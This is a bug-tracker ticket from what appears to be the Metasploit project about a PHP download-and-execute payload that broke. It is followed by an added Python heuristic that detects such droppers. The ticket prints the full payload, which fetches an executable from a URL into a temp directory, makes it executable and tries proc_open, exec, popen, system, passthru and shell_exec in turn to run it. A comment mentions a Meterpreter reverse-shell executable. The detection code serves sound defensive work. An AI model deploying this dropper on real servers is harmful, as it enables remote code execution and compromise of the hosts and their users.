Bug #2495
PHP/Download_Exec payload stopped working after one of the later updates
| Status: | Closed | Start date: | 09/04/2010 |
|---|---|---|---|
| Priority: | Normal | Due date: | |
| Assignee: | - | % Done: | 100% |
| Category: | - | | |
| Target version: | - | | |
| Resolution: | | Release Note: | |
Description
```php
<?php
if (!function_exists('sys_get_temp_dir')) {
    function sys_get_temp_dir() {
        if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
        if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }
        if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }
        $tempfile=tempnam(uniqid(rand(),TRUE),'');
        if (file_exists($tempfile)) {
            @unlink($tempfile);
            return realpath(dirname($tempfile));
        }
        return null;
    }
}
$fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "Zmku.exe";
$fd_in = fopen("<downloadurl>", "rb");
$fd_out = fopen($fname, "wb");
while (!feof($fd_in)) {
    fwrite($fd_out, fread($fd_in, 8192));
}
fclose($fd_in);
fclose($fd_out);
chmod($fname, 0777);
$c = $fname;
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
$GNNjfQ=@ini_get('disable_functions');
if(!empty($GNNjfQ)){
    $GNNjfQ=preg_replace('/[, ]+/', ',', $GNNjfQ);
    $GNNjfQ=explode(',', $GNNjfQ);
    $GNNjfQ=array_map('trim', $GNNjfQ);
}else{
    $GNNjfQ=array();
}
#if (!(strtolower(PHP_OS) =~ 'win')) { #
# $c=$c." 2>&1\n"; # This is the code that leads to the error, tested with
#} # windows/meterpreter/reverse_tcp_dns payload available as exe file via http
$RlMiB='is_callable';
$GYuz='in_array';
if($RlMiB('proc_open')and!$GYuz('proc_open',$GNNjfQ)){
    $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
    $uDyyg=NULL;
    while(!feof($pipes[1])){
        $uDyyg.=fread($pipes[1],1024);
    }
    @proc_close($handle);
}else
if($RlMiB('exec')and!$GYuz('exec',$GNNjfQ)){
    $uDyyg=array();
    exec($c,$uDyyg);
    $uDyyg=join(chr(10),$uDyyg).chr(10);
}else
if($RlMiB('popen')and!$GYuz('popen',$GNNjfQ)){
    $fp=popen($c,'r');
    $uDyyg=NULL;
    if(is_resource($fp)){
        while(!feof($fp)){
            $uDyyg.=fread($fp,1024);
        }
    }
    @pclose($fp);
}else
if($RlMiB('system')and!$GYuz('system',$GNNjfQ)){
    ob_start();
    system($c);
    $uDyyg=ob_get_contents();
    ob_end_clean();
}else
if($RlMiB('passthru')and!$GYuz('passthru',$GNNjfQ)){
    ob_start();
    passthru($c);
    $uDyyg=ob_get_contents();
    ob_end_clean();
}else
if($RlMiB('shell_exec')and!$GYuz('shell_exec',$GNNjfQ)){
    $uDyyg=shell_exec($c);
}else
{
    $uDyyg=0;
}
@unlink($fname);
?>
```
Associated revisions
ugh, i'm bouncing between too many languages, this syntax doesn't even work in php. fixes #2495
git-svn-id: file:///home/svn/framework3/trunk@10240 4d416f70-5f16-0410-b530-b9f4589650da
History
Updated by Oliver Kleinecke over 1 year ago
sry, code-highlighting made it unreadable -.-
The erroneous code is in line 36 and following:

```php
#if (!(strtolower(PHP_OS) =~ 'win')) { #
#$c=$c." 2>&1\n"; # This is the code that leads to the error, tested with
#} # windows/meterpreter/reverse_tcp_dns payload available as exe file via http
$RlMiB='is_callable';
$GYuz='in_array';
```
Updated by James Lee over 1 year ago
- Status changed from New to Resolved
- % Done changed from 0 to 100
Applied in changeset r10240.
Updated by James Lee over 1 year ago
- Status changed from Resolved to Closed
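
A defender's view of the payload quoted in the description, as an added example that is not part of the ticket or the project's code: a heuristic that scores a PHP source string on the traits visible in that payload and flags only their combination. The trait names, the threshold of 4 and both sample strings are assumptions constructed for this example.

```python
import re

# Exec-family functions the ticket's payload probes by name, in order.
EXEC_FUNCS = ("proc_open", "exec", "popen", "system", "passthru", "shell_exec")

# Traits visible in the quoted payload; trait names are this example's own.
TRAITS = {
    "probes_disable_functions": r"ini_get\(\s*['\"]disable_functions['\"]\s*\)",
    "builds_temp_path": r"sys_get_temp_dir\s*\(\s*\)\s*\.\s*DIRECTORY_SEPARATOR",
    "binary_write_handle": r"fopen\([^)]*,\s*['\"]wb['\"]\s*\)",
    "chmod_0777": r"chmod\([^)]*,\s*0777\s*\)",
    "unlinks_variable_path": r"unlink\(\s*\$\w+\s*\)",
}

def exec_fallbacks(src):
    """Exec-family names present as quoted strings (probed via is_callable)."""
    return [f for f in EXEC_FUNCS if re.search(r"['\"]" + f + r"['\"]", src)]

def score(src):
    """Return the names of all traits found in a PHP source string."""
    hits = [name for name, rx in TRAITS.items() if re.search(rx, src)]
    if len(exec_fallbacks(src)) >= 3:
        hits.append("exec_fallback_chain")
    return hits

def is_suspicious(src, threshold=4):
    """Single traits are common in benign code; flag only a combination."""
    return len(score(src)) >= threshold

# Constructed sample: lines condensed from the payload in the ticket.
SAMPLE_DROPPER = r'''
$fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "Zmku.exe";
$fd_out = fopen($fname, "wb");
chmod($fname, 0777);
$d=@ini_get('disable_functions');
if($a('proc_open')and!$b('proc_open',$d)){}else
if($a('exec')and!$b('exec',$d)){}else
if($a('popen')and!$b('popen',$d)){}
@unlink($fname);
'''
# Constructed benign sample: a temp-file export that shares three traits.
SAMPLE_BENIGN = r'''
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "report.csv";
$out = fopen($tmp, "wb");
fwrite($out, $csv);
unlink($tmp);
'''

for label, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
    print(label, is_suspicious(src), score(src))
```

The benign sample matches three traits on its own, which is why the check keys on the combination with the `disable_functions` probe and the exec-family fallback chain rather than on any single call.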